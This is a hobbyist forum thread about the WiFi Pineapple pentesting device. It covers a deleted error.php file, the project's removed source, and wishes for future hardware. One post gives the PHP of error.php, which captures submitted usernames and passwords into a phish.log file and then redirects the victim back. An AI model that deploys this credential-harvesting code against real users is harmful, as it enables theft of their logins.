Where Could I Find Pineapple Files?

logic10

Hello All,

I recently upgraded my firmware on my Mark IV..got really excited and browsed around..accidently removed error.php under /www/

Does anyone know if error.php was edited(updated) in recent firmware patches? << reason why I'm asking is that I have the error.php when the pineapple was first released to public.

If not, I'll probably have to look up what the code was to restore this file.

Thanks!

Hello All,

I recently upgraded my firmware on my Mark IV..got really excited and browsed around..accidently removed error.php under /www/

Does anyone know if error.php was edited(updated) in recent firmware patches? << reason why I'm asking is that I have the error.php when the pineapple was first released to public.

If not, I'll probably have to look up what the code was to restore this file.

Thanks!

&lt;?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) &amp;&amp; !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;

$filed = @fopen("pineapple/logs/phish.log", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
}
?&gt;

&lt;html&gt;&lt;head&gt;
&lt;script type="text/javascript"&gt;
function goBack()
{
window.history.back()
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload="goBack()"&gt;
&lt;/body&gt;&lt;/html&gt;

What happen to the source ??

I thought this was an open source project or is it going the way of the rubber ducky?? The github witht the pineapplestuff was nice but it seems to have been taken down and put at the very bottom of the todo list. Please dont let this just taper off like the rubber ducky did.

I thought this was an open source project or is it going the way of the rubber ducky?? The github witht the pineapplestuff was nice but it seems to have been taken down and put at the very bottom of the todo list. Please dont let this just taper off like the rubber ducky did.

The source has been taken down because we are restructuring how we want to do these things.

If you want the latest source, see your pineapple's /www/ folder.

What I can guarantee you is that the development of the pineapple is in no way coming to a halt or slowing down.

Granted, the last month was a bit slow, but hey, we have been working hard on new features for you guys ;)

We are also working hard to get some sweet things to be ready for Defcon, so if I had to give an ETA, I would say these things will be sorted out by then ;)

I hope this clears some things up and convinces you that we are not going to let you guys down!

Best,

Sebkinne

I don't think the pineapple could taper off- far too much support and possibilities, where as the rubber ducky is restricted uses. I'm waiting for the mk5 pineapple to make its appearance, built in 3g, multiple internal wireless interfaces and a full set of backtrack like tools pre-installed ;)

I don't think the pineapple could taper off- far too much support and possibilities, where as the rubber ducky is restricted uses. I'm waiting for the mk5 pineapple to make its appearance, built in 3g, multiple internal wireless interfaces and a full set of backtrack like tools pre-installed ;)

I see you are setting high demands for us? ;)

If you really want the files go to my fork of the pineapple at github molotof/wifipineapple :)

I wish for all that to happen without going the NV ION platform and powering 12v dc, wish i can find an ARM that is not so androidy and limited, BT5 arm native with usb host and compiled wifi drivers ahhhhhhhhhh !

Seb- no demands, just visions of things you and the jasager team might have up your sleeve :)

Molotof- I know, the raspberry pi had so much hype and I still haven't got mine, but have got a spare pc engines wrap kicking around that just happens to run off the anker astro3 battery- need to have a mess around with it, see if I can get reaver running! I am also waiting for the perfect portable and remotely deployable backtrack platform! We can hope!